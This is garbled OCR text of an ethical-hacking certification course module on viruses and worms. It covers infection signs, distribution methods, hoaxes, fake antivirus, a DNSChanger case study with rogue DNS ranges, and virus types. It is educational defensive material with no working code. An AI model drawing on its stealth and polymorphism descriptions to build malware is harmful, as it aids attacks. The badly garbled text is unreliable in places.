  • 18. Ethical Hacking and Countermeasures Viruses and W orm s Q Id e n tity th e ft Q S pyw are Q Exam 312-50 C ertified Ethical Hacker C r y p t o v ir a l e x t o r t i o n M odule 07 Page 1023 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 19. Ethical Hacking and Counterm easures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker P rocesses ta k e m o re re s o u rc e s a n d tim e C o m p u te r s lo w s dow n when p r o g ra m s s ta rt C o m p u te r fre e z e s fr e q u e n t ly o r e n c o u n te rs e r ro r I n d ic a tio n s o f V iru s A tta c k s A n e f f e c t i v e v iru s t e n d s t o m u l t i p l y r a p id l y a n d m a y in f e c t a n u m b e r o f m a c h in e s w i t h i n t h r e e t o f iv e days. V iru s e s ca n in f e c t W o r d fi l e s w h i c h , w h e n t r a n s f e r r e d , can in f e c t t h e m a c h in e s o f t h e u sers w h o r e c e iv e t h e m . A v ir u s can also m a k e g o o d use o f f ile s e rv e rs in o r d e r t o i n f e c t file s . T h e f o l l o w i n g a re i n d i c a t i o n s o f a v i r u s a t t a c k o n a c o m p u t e r s y s te m : Q P r o g r a m s ta k e lo n g e r t o loa d Q T h e h a r d d r iv e is a lw a y s fu ll, e v e n w i t h o u t in s t a llin g a n y p r o g r a m s Q T h e f l o p p y d is k d r iv e o r h a r d d r i v e r u n s w h e n it is n o t b e in g used 9 U n k n o w n file s k e e p a p p e a r i n g o n t h e s y s te m 0 T h e k e y b o a r d o r t h e c o m p u t e r e m i t s s tr a n g e o r b e e p in g s o u n d s Q T h e c o m p u t e r m o n i t o r d is p la y s s tr a n g e g r a p h ic s Q File n a m e s t u r n s tr a n g e , o f t e n b e y o n d r e c o g n i t i o n Q T h e h a r d d r iv e b e c o m e s in a c c e s s ib le w h e n t r y i n g t o b o o t f r o m t h e f l o p p y d r i v e © A p r o g r a m 's size k e e p s c h a n g in g Q T h e m e m o r y o n t h e s y s te m s e e m s t o be in use a nd t h e s y s te m s lo w s d o w n M odule 07 Page 1024 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 20. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker H o w does a Computer Get Infected by Viruses W h e n a user accepts files and d o w nloads w ith o u t checking p ro p e rlyfo rth e source ‫ן‬ ing infected e-mail attachm ents Installing pirated so ftw are Not updatingand not installing new versions o f plug-ins : runningthe latest anti-virus application Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. H ow D o es a C o m p u te r G et In fe c te d b y V iru se s? T h e r e a re m a n y w a y s in w h i c h a c o m p u t e r g e ts i n f e c t e d b y viru s e s . T h e m o s t p o p u l a r m e t h o d s a re as f o l lo w s : © W h e n a u s e r a c c e p ts file s a n d d o w n l o a d s w i t h o u t c h e c k in g p r o p e r l y f o r t h e s o u rc e . © A t t a c k e r s u s u a lly se n d v i r u s - in f e c t e d file s as e m a il a t t a c h m e n t s t o s p re a d t h e v ir u s on t h e v i c t i m ' s s y s t e m . If t h e v i c t i m o p e n s t h e m a il, t h e v ir u s a u t o m a t i c a l l y i n f e c ts t h e s y s te m . © A t t a c k e r s i n c o r p o r a t e v iru s e s in p o p u l a r s o f t w a r e p r o g r a m s a n d u p lo a d t h e i n f e c t e d s o ftw a re on w e b s ite s in te n d e d to d o w n lo a d s o ftw a re . W h e n th e v ic tim d o w n lo a d s i n f e c t e d s o f t w a r e a n d in s ta lls it, t h e s y s te m g e ts i n f e c t e d . © Failing t o in s ta ll n e w v e r s io n s o r u p d a t e w i t h la t e s t p a t c h e s i n t e n d e d t o fix t h e k n o w n b ug s m a y e x p o s e y o u r s y s te m t o viru s e s . © W i t h t h e in c r e a s in g t e c h n o l o g y , a tt a c k e r s also a re d e s ig n in g n e w v iru s e s . Failing t o use la t e s t a n t i v i r u s a p p li c a t i o n s m a y e x p o s e y o u t o v i r u s a t t a c k s M odule 07 Page 1025 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 21. Ethical Hacking and Counterm easures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker C o m m o n T e c h n i q u e s U s e d to D istrib u te M a lw a re o n th e W eb H B la c k h a t S e a rc h E n gin e O p tim iza tio n (SEO ) CEH M a lv e rtis in g Ranking malware pages highly in search results Embedding malware in ad-networks that display across hundreds of legitimate, high-traffic sites S o c ia l E n g in eered C lic k -ja c k in g C o m p ro m ise d L e g itim a te W e b sites Tricking users into clicking on innocent-looking webpages Hosting embedded malware that spreads to unsuspecting visitors S p e a rp h is h in g S ites Drive-by D o w n lo ad s Mimicking legitimate institutions, such as banks, in an attempt to steal account login credentials ‫^ ״‬ ‫ ן ן ו‬jl. Exploiting flaws in browser software to install malware just by visiting a web page Source: Security Threat Report 2012 (http://www.sophos.com ) Copyright © by ^ EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited. -C C o m m o n T e c h n i q u e s U s e d to D i s t r i b u t e M a l w a r e o n th e W eb S o u rc e : S e c u r ity T h r e a t R e p o r t 2 0 1 2 ( h t t p : / / w w w . s o p h o s . c o m ) Blackhat Search Engine Optimization (SEO): U s in g t h is t e c h n i q u e t h e a t t a c k e r r a n k s m a l w a r e p a g e s h ig h in se arch re s u lts Social Engineered Click-jacking: T h e a t t a c k e r s t r i c k t h e users i n t o c lic k in g o n i n n o c e n t - l o o k i n g w e b p ages t h a t c o n t a i n m a l w a r e Spearphishing Sites: T his t e c h n i q u e is used f o r m im i c k i n g l e g i t i m a t e in s t it u t i o n s , such as ban ks, in an a t t e m p t t o ste al a c c o u n t lo g in c r e d e n t i a l s Malvertising: E m b e d s m a l w a r e in ad n e t w o r k s t h a t d is p la y ac ro s s h u n d r e d s o f l e g i t i m a t e , h ig h t r a f f i c sites Compromised Legitimate W ebsites: H o s t e m b e d d e d m a l w a r e t h a t s p re a d s t o u n s u s p e c t i n g v is ito rs Drive-by Downloads: T h e a t t a c k e r e x p l o i t s f l a w s in b r o w s e r s o f t w a r e t o in s ta ll m a l w a r e j u s t by v is itin g a w e b p age M odule 07 Page 1026 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 22. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Virus Hoaxes and Fake Antiviruses A tta c k e rs d is g u is e m a lw a r e s as a n a n t iv ir u s a n d t r ic k u s e rs t o in s ta ll th e m in t h e ir c o n ta in v ir u s a tta c h m e n ts s y s te m s W a r n in g m e s s a g e s p r o p a g a tin g t h a t a O n c e in s ta lle d th e s e fa k e a n tiv iru s e s c a n c e r ta in e m a il m e s s a g e s h o u ld n o t b e v ie w e d d a m a g e t a r g e t s y s te m s s im ila r t o o t h e r a n d d o in g s o w ill d a m a g e o n e 's s y s te m J H o axes a re fa ls e a la rm s c la im in g r e p o r ts a b o u t a n o n - e x is tin g v ir u s w h ic h m a y J m a lw a re s ntAsc rmv/Aflo m u warning among rniCNDS.rAMiiv and contacts Ho* •houM t* »k«t d*'•* tbv mat fmv Jwyv Co ikx cptn «1» i‫׳‬i«im«« with 4 1etMchmvH vntlltvO >OSTCAAO 'ROM •Uir.O ■ y 1 RtMONATION Of BARACK OBAMA . regjrdl«»l0f WhO sent IttO you It IS J vlruStlWt Opers A KttrtAftUlMAOt, then Dim* th -whole run) C a « ol YOU' computer. « rih b lIvmNHMlWdiliuumnl UyCNN Uni 1 Im Hid) U• I k •• jy M lllW A 1 4 (*•sif jctivtvirasawf Thevirw ...1 .discoveredbv McAfee v«terdiv. «ndthp‫׳‬p nortear 1> A W C * * * tifa ft-0WI1 1l'W« IN MN'R NV M A n NA i* F R A r)T4 AN flA 0 n lF 0 tA IIV NrOT rn l ‫ «י‬HUM j*for :h& tSeZeto Setloiof llie llodDiM., mIivictl.r viulxifoimatbonk«vL »‫׳‬ — wi ss*‫־‬ f rr‫•־‬ ‫״‬ ‫״‬ jy y |r J !!L l: — =«=— ‫נ‬ 0llicil. All Rights Reserved. Reproduction is Strictly Prohibited. Copyright © by E GG V iru s H o ax e s a n d F a k e A n tiv iru s e s V iru s H o a x e s A v ir u s h o a x is s i m p l y a b lu ff. V iru s e s , by t h e i r n a t u r e , h a v e a lw a y s c r e a te d a h o r r i f y i n g i m p r e s s io n . H oa x es a re t y p i c a l l y u n t r u e sca re a le r t s t h a t u n s c r u p u l o u s in d iv id u a ls s e n d t o c r e a te h a v o c . It is f a i r l y c o m m o n f o r i n n o c e n t users t o pass th e s e p h o n y m essa ge s a lo n g t h i n k i n g t h e y a re h e lp in g o t h e r s a v o id t h e " v i r u s . " © H oa xes a re fa lse a la r m s c la im in g r e p o r t s a b o u t n o n - e x i s t i n g v iru s e s © T he se w a r n i n g m essages, w h i c h can b e p r o p a g a t e d r a p id ly , s t a t in g t h a t ac e r ta in e m a il m e s s a g e s h o u ld n o t be o p e n e d , a n d t h a t d o i n g so w o u l d d a m a g e o n e 's s y s te m © In s o m e cases, th e s e w a r n i n g m essa ge s t h e m s e l v e s c o n t a i n v iru s a t t a c h m e n t s © T he se possess t h e c a p a b i l it y o f v a s t d e s t r u c t i o n o n t a r g e t s y s te m s M a n y h o a x e s t r y t o " s e l l" t h in g s t h a t a re t e c h n i c a l l y n o n s e n s e . N e v e rth e le s s , t h e h o a x e r has t o be s o m e w h a t o f an e x p e r t t o s p re a d h o a x e s in o r d e r t o a v o id b e in g i d e n t if ie d a n d c a u g h t. T h e r e f o r e , it is a g o o d p r a c tic e t o lo o k f o r t e c h n i c a l d e t a i ls a b o u t h o w t o b e c o m e i n f e c t e d . A lso se arch f o r i n f o r m a t i o n in t h e w i ld t o le a rn m o r e a b o u t t h e h o a x , e s p e c ia lly by s c a n n in g b u l l e t i n b o a r d s w h e r e p e o p le a c tiv e ly discuss c u r r e n t h a p p e n in g s in t h e c o m m u n i t y . M odule 07 Page 1027 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 23. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker T ry t o c ro s s c h e c k t h e i d e n t i t y o f t h e p e r s o n w h o has p o s te d t h e w a r n i n g . A lso l o o k f o r m o r e i n f o r m a t i o n a b o u t t h e h o a x / w a r n i n g f r o m s e c o n d a r y s o u rc e s . B e fo re j u m p i n g t o c o n c lu s io n s by r e a d in g c e r t a i n d o c u m e n t s o n t h e I n t e r n e t , c h e c k t h e f o l l o w i n g : Q If it is p o s te d by n e w s g r o u p s t h a t a re s u s p ic io u s , c r o s s c h e c k t h e i n f o r m a t i o n w i t h a n o th e r source © If t h e p e r s o n w h o has p o s te d t h e n e w s is n o t a k n o w n p e r s o n in t h e c o m m u n i t y o r an e x p e r t , c ro s s c h e c k t h e i n f o r m a t i o n w i t h a n o t h e r s o u r c e 0 If a g o v e r n m e n t b o d y has p o s te d t h e n e w s , t h e p o s tin g s h o u ld also h a v e a r e f e r e n c e t o th e c o rre s p o n d in g fe d e ra l r e g u la tio n Q O n e o f t h e m o s t e f f e c t i v e c h e c k s is t o lo o k u p t h e s u s p e c te d h o a x v i r u s b y n a m e o n a n t i v i r u s s o f t w a r e v e n d o r sites Q If t h e p o s tin g is te c h n ic a l, h u n t f o r sites t h a t w o u l d c a t e r t o t h e t e c h n i c a l i t i e s , a n d t r y t o a u th e n tic a te th e in fo rm a tio n Subject: FORWARD THIS W ARNIN G A M O N G FRIENDS, FAMILY AND CONTACTS PLEASE FORWARD THIS WARNING AM O N G FRIENDS, FAMILY AND CONTACTSI You should be alert during the next few days. Do not open any message with an attachment entitled 'POSTCARD FROM BEJING or 'RESIGNATION OF 8ARACK O B A M A , regardless of who sent it to you. It is a virus that opens A POSTCARD IMAGE, then 'burns' the whole hard C disc of your computer. This is the worst virus announced by CNN last evening. It has been classified by Microsoft as the most destructive virus ever. The virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept. COPY THIS E MAIL, AND SEND IT TO YOUR FRIENDS.REMEMBER: IF YOU SEND IT TO THEM , YOU WILL BENEFIT ALL OF US. End-of-mail Thanks. FIGURE 7.3: Hoaxes Warning Message F a k e A n tiv iru s e s Fake a n tiv ir u s e s is a m e t h o d o f a f f e c t i n g a s y s te m b y h a c k e rs a n d it can p o is o n y o u r s y s te m a n d o u t b r e a k t h e r e g is t r y a n d s y s te m file s t o a l l o w t h e a t t a c k e r t o t a k e f u ll c o n t r o l a n d access t o y o u r c o m p u t e r . It a p p e a rs a n d p e r f o r m s s i m i l a r l y t o a real a n t i v i r u s p r o g r a m . Fake a n t i v i r u s p r o g r a m s f i r s t a p p e a r o n d i f f e r e n t b r o w s e r s a n d w a r n users t h a t t h e y h ave d i f f e r e n t s e c u r i t y t h r e a t s o n t h e i r s y s te m , a n d t h is m e s s a g e is b a c k e d u p b y r e a l s u s p ic io u s v iru s e s . W h e n t h e u s e r tr ie s t o r e m o v e t h e v ir u s e s , t h e n t h e y a re n a v ig a te d t o a n o t h e r p age w h e r e t h e y n e e d t o b u y o r s u b s c r ib e t o t h a t a n t i v i r u s a n d p r o c e e d t o p a y m e n t d e ta ils . T he se f a k e a n t i v i r u s p r o g r a m s a re b e e n f a b r i c a t e d in s u ch a w a y t h a t t h e y d r a w t h e a t t e n t i o n o f t h e u n s u s p e c t i n g u s e r i n t o in s t a llin g t h e s o f t w a r e . S o m e o f t h e m e t h o d s used t o e x t e n d t h e usage a n d in s t a l l a t i o n o f fa k e a n t i v i r u s p r o g r a m s in c lu d e : © E m a il a n d m e s s a g in g : A t t a c k e r s use s p a m e m a il a n d social n e t w o r k i n g m e ss a g e s t o s p re a d t h is t y p e o f i n f e c t e d e m a il t o users a n d p r o b e t h e u s e r t o o p e n t h e a t t a c h m e n t s f o r s o f t w a r e i n s t a lla t io n . M odule 07 Page 1028 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 24. Ethical Hacking and Countermeasures Viruses and W orm s Q Exam 312-50 C ertified Ethical Hacker Search e n g in e o p tim iz a tio n : A t t a c k e r s g e n e r a t e p ages r e la t e d t o p u b lic o r c u r r e n t s e a rch t e r m s a n d p la n t t h e m t o a p p e a r as e x t r a o r d i n a r y a n d t h e la t e s t in s e a rch e n g in e r e s u lts . T h e w e b p ages s h o w a le rts a b o u t i n f e c t i o n t h a t e n c o u r a g e t h e u s e r t o b u y t h e fa k e a n tiv ir u s . Q C o m p ro m is e d w e b s ite s : A t t a c k e r s s e c r e t l y b r e a k i n t o p o p u l a r sites t o in s ta ll t h e fa k e a n tiv ir u s e s , w h i c h can be used t o e n tic e users t o d o w n l o a d t h e f a k e a n t i v i r u s b y r e ly in g o n t h e s ite 's p o p u l a r i t y . J a Protection a - acy ‫׳‬w I P a th q 0, 'S (‫י‬ M p 0 < *© ‫ י#י*י‬S « M1 r» 4 Inlrctiom I C w » C « C ^ S JN t5 ^ c ^ « U Jr^ 4 ifV * g 0 a 5 7 2 35 SMtWI FIGURE 7.4: Example of a Fake Antivirus M odule 07 Page 1029 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 25. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Virus Analysis: DNSChanger DNSChanger (Alureon) modifies the DNS settings on the victim PC to divert Internet traffic to malicious websites in order to generate fraudulent ad revenue, sell fake services, or steal personal financial information CEH J <W > It acts as a bot and can be organized into a BotNet and controlled from a remote location J It spreads through emails, social engineering tricks, and untrusted downloads from the Internet UHU $ DNSChanger malware achieves the DNS redirection by modifying the following registry key settings against a interface device such as network card HKEY_LOCAL_MACHINESYSTEMCurrentControl SetServicesTcpipParameterslnterfaces%Ra ndom C %NameServer LSID t J <K > DNSChanger has received significant attention due to the large number of affected systems worldwide and the fact that as part of the BotNet takedown the FBI took ownership of the rogue DNS servers to ensure those affected did not immediately lose the ability to resolve DNS names http://www. totaldefense. com Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. V iru s A n a ly sis: D N S C h a n g e r S o u rc e : h t t p : / / w w w . t o t a l d e f e n s e . c o m D N S C h a n g e r ( A l u r e o n ) is m a l w a r e t h a t s p re a d s t h r o u g h e m a ils , s o c ia l e n g i n e e r i n g tr i c k s , a nd u n t r u s t e d d o w n l o a d s f r o m t h e I n t e r n e t . It a cts as a b o t a n d can be o rg a n iz e d i n t o a b o t n e t a nd c o n t r o l l e d f r o m a r e m o t e l o c a tio n . T his m a l w a r e a c h ie v e s DNS r e d i r e c t i o n b y m o d i f y i n g t h e s y s te m r e g is t r y k e y s e ttin g s a g a in s t an i n t e r f a c e d e v ic e such as n e t w o r k c a rd . D N S C h a n g e r has r e c e iv e d s i g n ific a n t a t t e n t i o n d u e t o t h e large n u m b e r o f a f f e c t e d s y s te m s w o r l d w i d e a n d t h e f a c t t h a t as p a r t o f t h e b o t n e t t a k e d o w n , t h e FBI t o o k o w n e r s h i p o f r o g u e DNS s e r v e r s t o e n s u r e t h o s e a f f e c t e d d id n o t i m m e d i a t e l y lose t h e a b i l it y t o re s o lv e DNS n a m e s . T his can e v e n m o d i f y t h e DNS s e ttin g s o n t h e v i c t i m ' s PC t o d i v e r t I n t e r n e t t r a f f i c t o m a lic io u s w e b s i t e s in o r d e r t o g e n e r a t e f r a u d u l e n t a d r e v e n u e , sell f a k e s e rv ic e s , o r ste al p e r s o n a l f in a n c ia l i n f o r m a t i o n . M odule 07 Page 1030 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 26. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Virus Analysis: DNSChanger ( C o n t ’d ) The rogue DNS servers can exist in any of the following ranges: L DNSChanger 64.28.176.0 - 64.28.191.255, 67.210.0.0 - 67.210.15.255 77.67.83.0 - 77.67.83.255, 93.188.160.0 - 93.188.167.255 85.255.112.0 - 85.255.127.255, 213.109.64.0 - 213.109.79.255 DNSChanger sniffs the credential and redirects the request to real website Real Website ww.xrecyritY-tP1 IP: 200.0.0.45 DNSChanger infects victim's computer by change her DNS IP address to: 64.28.176.2 Attacker runs DNS Server in Russia (IP: 64.28.176.2) http://www. tota!defense,com Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. tout V i r u s A n a l y s i s : D N S C h a n g e r ( C o n t ’d) ’ S o u rc e : h t t p : / / w w w . t o t a l d e f e n s e . c o m T h e r o g u e DNS s e rv e rs can e x is t in a n y o f t h e f o l l o w i n g ran ge s: 64.28.176.0 - 64.28.191.255 , 67.210.0.0 ‫552.51.012.76 ־‬ 77.67.83.0 - 77.67.83.255 , 93.188.160.0 - 93.188.167.255 85.255.112.0 - 85.255.127.255 , 213.109.64.0 - 213.109.79.255 M odule 07 Page 1031 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 27. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker W h al is the IP address of w w w . *security. corn © > DNSChanger sniffs the credential and redirects the request to real website Fake Website IP: 65.0.0.2 » ‫י‬ Real Website wvAv.xsecuritv.com IP: 200.0.0.45 © DNS Request do to 64.28.176.2 > DNSChanger infects victim's computer by change her DNS IP address to: 64.28.176.2 © □ Attacker runs DNS Server in Russia (IP: 64.28.176.2) FIGURE 7.5: Virus Analysis Using DNSChanger T o in f e c t t h e s y s te m a nd s te a l c r e d e n tia ls , t h e a t t a c k e r has t o f i r s t ru n DNS s e rv e r. H e re t h e a t t a c k e r r u n s his o r h e r D N S s e r v e r in Russia w i t h an IP o f, say, 6 4 .2 8 . 1 7 6 . 2 . N e x t, t h e a t t a c k e r i n f e c ts t h e v i c t i m ' s c o m p u t e r by c h a n g in g his o r h e r DNS IP a d d re s s t o : 6 4 .2 8 .1 7 6 .2 . W h e n th is m a l w a r e has i n f e c t e d t h e s y s te m , it e n t i r e l y c h a n g e s t h e DNS s e ttin g s o f t h e i n f e c t e d m a c h in e a n d fo r c e s all t h e DNS r e q u e s t t o g o t o t h e D N S s e rv e r ru n b y t h e a tta c k e r . A f t e r a lt e r in g th e s e t t i n g o f t h e DNS, a n y r e q u e s t t h a t is m a d e b y t h e s y s te m is s e n t t o t h e m a l i c io u s DNS s e r v e r . H e re , t h e v ic tim sent DNS Request ‫״‬w h a t is t h e IP a d d re s s o f w w w .x s e c u rity .c o m ‫״‬ to ( 6 4 .2 8 .1 7 6 .2 ). T h e a t t a c k e r g a v e a re s p o n s e t o t h e r e q u e s t as w w w . x s e c u r i t v . c o m . w h i c h is l o c a te d a t 6 5 .0 .0 .2 . W h e n v i c t i m ' s b r o w s e r c o n n e c t s t o 6 5 .0 .0 .2 , it r e d ir e c ts h im o r h e r t o a fa k e w e b s i t e c r e a te d b y t h e a t t a c k e r w i t h IP: 6 5 .0 .0 .2 . D N S C h a n g e r s n iffs t h e c r e d e n t i a l (u s e r n a m e , p a s s w o r d s ) a n d r e d ir e c ts t h e r e q u e s t t o real w e b s i t e (w w w . x s e c u r i t y . c o m ) w i t h IP: 2 0 0 .0 .0 .4 5 . M odule 07 Page 1032 Ethical Hacking and C ounterm easures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 28. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker M odule Flow CEH V iru s and W orm s C on cep ts C o m p uter W orm s P en etratio n Testing C ounter• m easures M a lw a re Analysis Copyright © by E&Caincil. All Rights Reserved. Reproduction is Strictly Prohibited. ■ = || M o d u l e F l o w P r io r t o th is , w e h a v e d is cu sse d a b o u t v iru s e s a n d w o r m s . N o w w e w i ll discuss a b o u t d i f f e r e n t ty p e s o f viru s e s . V iru s a n d W o rm s C o nc e p t i • y — v‫׳‬ C X M a lw a r e A nalysis T y p e s o f V ir u s e s C o m p u te r W o rm s C o u n te rm e a s u re s ^ ) P e n e tra tio n T es tin g — This s e c tio n d e s c r ib e s a b o u t d i f f e r e n t ty p e s o f V iru se s. M odule 07 Page 1033 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 29. Ethical Hacking and Countermeasures Viruses and W orm s System or Boot Sector Viruses Exam 312-50 C ertified Ethical Hacker Stealth Virus/ Tunneling Virus Cluster Viruses Encryption Polymorphic Metamorphic Sparse Infector Virus Direct Action or Transient Multipartite T y p e s of V iru se s So fa r, w e h a v e d iscu ss e d v a r io u s v ir u s a n d w o r m c o n c e p ts . N o w w e w ill discuss v a r io u s t y p e s o f viru s e s . T his s e c tio n h ig h lig h ts v a r io u s ty p e s o f v iru s e s a n d w o r m s such as file a n d m u l t i p a r t i t e v ir u s e s , m a c r o v iru s e s , c lu s t e r viru s e s , s t e a l t h / t u n n e l i n g v iru s e s , e n c r y p t i o n v iru s e s , m e t a m o r p h i c v iru s e s , shell viru s e s , a n d so o n . C o m p u t e r v iru s e s a re t h e m a l i c io u s s o f t w a r e p r o g r a m s w r i t t e n by a t ta c k e r s t o i n t e n t i o n a l l y e n t e r t h e t a r g e t e d s y s te m w i t h o u t t h e u s e r 's p e r m i s s i o n . As a re s u lt, t h e y a f f e c t t h e s e c u r it y s y s te m a n d p e r f o r m a n c e o f t h e m a c h in e . A f e w o f t h e m o s t c o m m o n ty p e s o f c o m p u t e r v iru s e s t h a t a d v e r s e l y a f f e c t s e c u r it y s y s te m s a re d iscu s se d in d e ta il o n t h e f o l l o w i n g slides. T y p e s of V iru se s V iru s e s a re cla s s ifie d d e p e n d i n g o n t w o c a te g o r ie s : Q W h a t Do T h e y In fe c t? © H o w Do T h e y In fe c t? M odule 07 Page 1034 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 30. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker W hat Do They In fe ct? System or Boot Sector V iruses _ f*. T h e m o s t c o m m o n t a r g e t s f o r a v iru s a re t h e s y s te m s e c to rs , w h i c h a re n o t h i n g b u t t h e M a s t e r B o o t R e c o rd a n d t h e DOS B o o t R e c o rd S y s t e m s e c to r s . T h e s e a re t h e a re a s o n th e d isk t h a t are e x e c u t e d w h e n t h e PC is b o o t e d . E ve ry d isk has a s y s te m s e c to r o f s o m e s o rt. T h e y s p e c ia lly in f e c t t h e f l o p p y b o o t s e c to r s a n d r e c o r d s o f t h e h a rd disk. For e x a m p le : Disk K iller a n d S to n e v iru s . F ile V iruses E x e c u ta b le file s a re i n f e c t e d b y file v iru s e s , as t h e y i n s e r t t h e i r c o d e i n t o t h e o r ig in a l file a n d g e t e x e c u te d . File v iru s e s a re la r g e r in n u m b e r , b u t t h e y a re n o t t h e m o s t c o m m o n l y f o u n d . T h e y i n f e c t in a v a r i e t y o f w a y s a n d can be f o u n d in a la rg e n u m b e r o f file ty p e s . M u ltip a rtite V irus T h e y i n f e c t p r o g r a m file s, a n d t h is f ile in t u r n a ffe c ts t h e b o o t s e c to r s su ch as In v a d e r , Flip, a n d T e q u ila . C lu ste r V iruses C lu s te r v iru s e s i n f e c t file s w i t h o u t c h a n g in g t h e f ile o r p la n t in g e x tr a file s ; t h e y c h a n g e t h e DOS d i r e c t o r y i n f o r m a t i o n so t h a t e n t r i e s p o i n t t o t h e v ir u s c o d e in s te a d o f t h e a c tu a l p ro g ra m . M acro V irus M i c r o s o f t W o r d o r a s i m i l a r a p p li c a t i o n can be i n f e c t e d t h r o u g h a c o m p u t e r v iru s c a lle d a m a c r o v iru s , w h i c h a u t o m a t i c a l l y p e r f o r m s a s e q u e n c e o f a c tio n s w h e n t h e a p p li c a t i o n is t r i g g e r e d o r s o m e t h i n g else. M a c r o v iru s e s a re s o m e w h a t less h a r m f u l t h a n o t h e r ty p e s . T h e y a re u s u a lly s p re a d via an e m a il. How Do They In fe ct? ‫־־‬ ‫׳‬ ■ Stealth V iruses T h e se v iru s e s t r y t o h id e t h e m s e l v e s f r o m a n t i v i r u s p r o g r a m s b y a c t i v e l y a l t e r i n g a n d c o r r u p t i n g t h e c h o s e n s e rv ic e call i n t e r r u p t s w h e n t h e y a re b e in g ru n . R e q u e s ts t o p e r f o r m o p e r a t i o n s in r e s p e c t t o th e s e se rv ic e call i n t e r r u p t s a re r e p la c e d by v iru s c o d e . T h e se v iru s e s s ta te fa lse i n f o r m a t i o n t o h id e t h e i r p r e s e n c e f r o m a n t i v i r u s p r o g r a m s . For e x a m p le , t h e s te a lth v ir u s h id e s t h e o p e r a t i o n s t h a t it m o d i f i e d a n d g ive s fa ls e r e p r e s e n t a t i o n s . T hus, it ta k e s o v e r p o r t i o n s o f t h e t a r g e t s y s te m a nd h id e s its v i r u s c o d e . Life‫:־‬ T u n n elin g V iruses T h e s e v ir u s e s t r a c e t h e s te p s o f i n t e r c e p t o r p r o g r a m s t h a t m o n i t o r o p e r a t i n g s y s te m r e q u e s ts so t h a t t h e y g e t i n t o BIOS a n d DOS t o in s ta ll th e m s e lv e s . T o p e r f o r m t h is a c tiv it y , t h e y even tu n n e l u n d e r a n tiv iru s s o ftw a re p ro g ra m s. M odule 07 Page 1035 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 31. Ethical Hacking and Counterm easures Viruses and W orm s c_ — Exam 312-50 C ertified Ethical Hacker E n cry p tio n V iruses T his t y p e o f v ir u s c o n s is ts o f an e n c r y p t e d c o p y o f t h e v iru s a n d a d e c r y p t i o n m o d u l e . T h e d e c r y p t i n g m o d u l e r e m a in s c o n s t a n t , w h e r e a s t h e d i f f e r e n t keys a re u sed f o r e n c r y p t i o n . iri) , ‫״ ״‬ P o ly m o rp h ic V iruses T h e s e v iru s e s w e r e d e v e lo p e d t o c o n f u s e a n t i v i r u s p r o g r a m s t h a t scan f o r v iru s e s in t h e s y s te m . It is d i f f i c u l t t o t r a c e t h e m , since t h e y c h a n g e t h e i r c h a r a c te r is t ic s e a ch t i m e t h e y in f e c t, e.g., e v e r y c o p y o f t h is v ir u s d if f e r s f r o m its p r e v io u s o n e . V i r u s d e v e l o p e r s h a v e e v e n c r e a t e d m e t a m o r p h i c e n g in e s a n d v ir u s w r i t i n g t o o l k its t h a t m a k e t h e c o d e o f an e x is t in g v ir u s lo o k d i f f e r e n t f r o m o t h e r s o f its k in d . M e ta m o rp h ic V iruses A c o d e t h a t can r e p r o g r a m it s e lf is c a lle d m e t a m o r p h i c c o d e . T his c o d e is t r a n s l a t e d i n t o t h e t e m p o r a r y c o d e , a n d t h e n c o n v e r t e d b a ck t o t h e n o r m a l c o d e . T his t e c h n i q u e , in w h i c h t h e o rig in a l a l g o r i t h m r e m a in s in t a c t, is u sed t o a v o id p a t t e r n r e c o g n i t i o n o f a n t i v i r u s s o f t w a r e . T his is m o r e e f f e c t i v e in c o m p a r i s o n t o p o l y m o r p h i c c o d e . T his t y p e o f v iru s c o n s is ts o f c o m p le x e x te n s iv e c o d e . O v erw ritin g F ile or C avity V iruses S o m e p r o g r a m file s h a v e a re as o f e m p t y space. T his e m p t y sp ace is t h e m a in t a r g e t o f th e s e viru s e s . T h e C a v i t y V ir u s , also k n o w n as t h e S pace F ille r V ir u s , s to r e s its c o d e in th is e m p t y space. T h e v ir u s in s ta lls it s e lf in th is u n o c c u p ie d sp ace w i t h o u t a n y d e s t r u c t io n t o t h e o rig in a l c o d e . It in s ta 